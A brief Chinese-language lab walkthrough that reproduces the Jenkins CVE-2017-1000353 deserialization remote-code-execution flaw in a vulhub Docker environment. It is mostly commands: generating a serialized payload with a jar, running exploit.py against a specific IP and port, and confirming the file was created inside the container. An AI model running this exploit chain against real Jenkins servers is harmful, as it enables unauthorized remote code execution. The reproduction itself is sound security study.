vulhub环境搭建:
cd /root/vulhub/jenkins/CVE-2017-1000353
docker-compose up -d
访问网址
http://120.79.66.58:8080/
漏洞复现:
1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的poc
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/CVE-2017-1000353_is_success"
生成的序列化字符串 jenkins_poc.ser
2、发送数据包,执行命令
漏洞利用脚本文件:https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py
注意:上面脚本利用的时候 把proxies注释掉
python exploit.py http://120.79.66.58:8080 jenkins_poc.ser
再查看自己的目录发现漏洞执行成功
docker exec -it cve-2017-1000353_jenkins_1 /bin/bash
ls /tmp